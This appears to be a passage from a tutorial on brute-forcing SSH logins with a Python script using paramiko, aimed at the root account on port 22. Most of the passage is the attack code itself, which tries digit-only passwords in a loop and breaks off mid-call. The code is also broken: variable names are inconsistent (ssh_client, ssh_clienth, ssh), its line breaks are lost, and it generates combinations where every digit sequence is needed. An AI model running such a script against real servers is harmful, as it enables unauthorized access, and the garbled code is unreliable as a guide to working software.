SSH brute-forcing
We can use Python script to automate the brute-force attack to break the SSH login. Here we try multiple usernames and passwords to bypass SSH authentication with automated Python script. For brute-forcing SSH, we have to use a module named paramiko, which lets us connect to SSH.
First, we import the required modules:
import paramiko, sys, os, socket import itertools,string,crypt
Then we initialize the static variables like password size, target IP, target port, and user:
PASS_SIZE = 5 IP = "" USER = "root" PORT=22 var = itertools.combinations(string.digits,PASS_SIZE)
Check with each password:
try: for i in var: passwd = ''.join(i) ssh_client = paramiko.SSHClient() ssh_client.load_system_host_keys() ssh_clienth.set_missing_host_key_policy(paramiko.MissingHostKeyPolicy()) try: ssh.connect(IP , port=PORT, username...